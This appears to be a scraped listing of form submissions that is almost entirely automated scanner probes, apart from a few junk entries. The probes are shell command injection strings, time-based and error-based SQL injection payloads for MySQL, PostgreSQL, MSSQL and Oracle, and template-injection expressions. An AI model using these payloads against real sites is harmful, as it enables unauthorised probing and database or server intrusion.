asfsdafadf |
safdsadfsadf |
9 |
asfdsadf |
asfdsadfsadf |
5 |
ทดสอบ |
ลูกหมี |
1 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456
expr 806643631 + 911461651 |
123456 |
0 |
123456 |
123456 |
0 |
123456|expr 860676646 + 997597630 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456$(expr 981379981 + 851570571) |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456&set /A 804223049+917111828 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
expr 988136468 + 800955257 |
123456 |
0 |
123456 |
123456/**/and+3=3 |
0 |
123456 |
123456 |
0 |
${@var_dump(md5(932458836))}; |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
${867745414+814812412} |
0 |
123456 |
123456/**/and+0=8 |
0 |
123456 |
123456 |
0 |
'-var_dump(md5(406726015))-' |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456'and'q'='q |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456'and'q'='x |
0 |
${836814936+871595687} |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456"and"h"="h |
0 |
123456 |
123456 |
0 |
123456 |
${@var_dump(md5(115118986))}; |
0 |
123456 |
123456 |
0 |
123456 |
/*1*/{{910721893+817060345}} |
0 |
123456 |
123456"and"r"="q |
0 |
123456 |
123456 |
0 |
123456 |
'-var_dump(md5(970558655))-' |
0 |
123456 |
123456 |
0 |
123456 |
123456
expr 820236960 + 852600769 |
0 |
123456 |
${985884113+834302190} |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456|expr 870201013 + 828848778 |
0 |
123456 |
${(821667042+979142897)?c} |
0 |
123456 |
123456 |
0 |
123456'and/**/extractvalue(1,concat(char(126),md5(1422578907)))and' |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456$(expr 821060664 + 921598404) |
0 |
123456 |
#set($c=990693761+955586870)${c}$c |
0 |
123456 |
123456 |
0 |
123456"and/**/extractvalue(1,concat(char(126),md5(1315345090)))and" |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456&set /A 842459504+983117614 |
0 |
123456 |
<%- 854587487+917327870 %> |
0 |
123456 |
(select*from(select+sleep(0)union/**/select+1)a) |
0 |
extractvalue(1,concat(char(126),md5(1393629389))) |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
expr 980011149 + 992607768 |
0 |
123456 |
123456 |
0 |
123456 |
(select*from(select+sleep(2)union/**/select+1)a) |
0 |
123456'and(select'1'from/**/cast(md5(1221956550)as/**/int))>'0 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' |
0 |
123456/**/and/**/cast(md5('1222527134')as/**/int)>0 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)=' |
0 |
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1330108417'))) |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" |
0 |
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1937893220')))>'0 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)=" |
0 |
123456鎈'"\( |
123456 |
0 |
123456 |
123456 |
0 |
/*1*/{{823544697+890739831}} |
123456 |
0 |
123456 |
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ |
0 |
123456'"\( |
123456 |
0 |
${848809169+935141870} |
123456 |
0 |
123456 |
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/ |
0 |
${(832756963+991606937)?c} |
123456 |
0 |
123456 |
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 |
0 |
#set($c=976369439+922723327)${c}$c |
123456 |
0 |
123456 |
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0 |
0 |
<%- 822302544+965784372 %> |
123456 |
0 |
123456 |
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ |
0 |
123456 |
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/ |
0 |
123456 |
123456'and(select+1)>0waitfor/**/delay'0:0:0 |
0 |
123456 |
123456'and(select+1)>0waitfor/**/delay'0:0:2 |
0 |
123456 |
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('i',0) |
0 |
123456 |
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('l',2) |
0 |
123456 |
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l |
0 |
123456 |
123456'and/**/extractvalue(1,concat(char(126),md5(1964833384)))and' |
0 |
123456 |
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('n',2)='n |
0 |
123456 |
123456"and/**/extractvalue(1,concat(char(126),md5(1574914394)))and" |
0 |
123456 |
extractvalue(1,concat(char(126),md5(1500346233))) |
0 |
123456 |
123456 |
0 |
123456 |
123456'and(select'1'from/**/cast(md5(1945269104)as/**/int))>'0 |
0 |
123456 |
123456 |
0 |
123456 |
123456/**/and/**/cast(md5('1900501834')as/**/int)>0 |
0 |
123456 |
123456 |
0 |
123456 |
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1972744041'))) |
0 |
123456 |
123456 |
0 |
123456 |
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1362490111')))>'0 |
0 |
123456 |
123456 |
0 |
123456 |
123456鎈'"\( |
0 |
123456 |
123456 |
0 |
123456 |
123456'"\( |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456 |
123456 |
0 |
123456/**/and+0=0 |
123456 |
0 |
123456/**/and+2=5 |
123456 |
0 |
123456'and'b'='b |
123456 |
0 |
123456'and'a'='z |
123456 |
0 |
123456"and"x"="x |
123456 |
0 |
123456"and"m"="r |
123456 |
0 |
(select*from(select+sleep(0)union/**/select+1)a) |
123456 |
0 |
(select*from(select+sleep(2)union/**/select+1)a) |
123456 |
0 |
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' |
123456 |
0 |
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)=' |
123456 |
0 |
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" |
123456 |
0 |
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)=" |
123456 |
0 |
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ |
123456 |
0 |
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/ |
123456 |
0 |
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 |
123456 |
0 |
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0 |
123456 |
0 |
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ |
123456 |
0 |
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/ |
123456 |
0 |
123456'and(select+1)>0waitfor/**/delay'0:0:0 |
123456 |
0 |
123456'and(select+1)>0waitfor/**/delay'0:0:2 |
123456 |
0 |
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('v',0) |
123456 |
0 |
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('v',2) |
123456 |
0 |
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('x',0)='x |
123456 |
0 |
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',2)='m |
123456 |
0 |